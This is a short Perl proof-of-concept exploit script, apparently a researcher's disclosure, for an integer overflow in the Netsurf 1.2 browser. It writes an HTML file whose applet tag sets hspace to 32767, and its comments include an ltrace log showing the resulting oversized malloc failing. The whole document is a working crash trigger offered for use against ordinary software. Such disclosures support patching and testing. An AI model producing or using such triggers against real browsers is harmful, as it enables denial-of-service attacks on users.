|
#!/usr/bin/perl
# netsurf_hspace_intof1.pl
# Netsurf 1.2 'hspace' Remote Integer Overflow PoC Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
#
# [ltrace log -- hspace = 30000, without --sync]
#
# gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)
# = 0x8cbda01
# cairo_reset_clip(0xb6600948, 0x80c4500, 0, 0, 0)
# = 0
# cairo_rectangle(0xb6600948, 0, 0, 0, 0)
# = 0
# cairo_clip(0xb6600948, 0, 0, 0, 0)
# = 0xb6600aec
# gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)
# = 0x8cbda01
# gdk_pixbuf_get_from_drawable(0, 0x8d0ed78, 0, 0, 0 <unfinished ...>
# malloc(3073536192) /// HUGE MALLOC
# = NULL
# <... gdk_pixbuf_get_from_drawable resumed> )
# = 0
# gdk_pixbuf_scale(0, 0x8c0e238, 0, 0, 100 <unfinished ...>
# free(0xb6600dc8)
# = <void>
# free(0xb6600de0)
# = <void>
#
# Adv Ref: netsurf_multiple_adv.txt
$filename = $ARGV[0];
if(!defined($filename))
{
print "Usage: $0 <filename.html>\n";
}
$head = "<html>" . "\n";
$trig = "<applet code=\"test.class\" hspace=\"32767\">" . "\n";
#$trig = "<img src=\"test.jpg\" hspace=\"32767\">" . "\n";
$foot = "</html>";
$data = $head . $trig . $foot;
open(FILE, '>' . $filename);
print FILE $data;
close(FILE);
exit;
|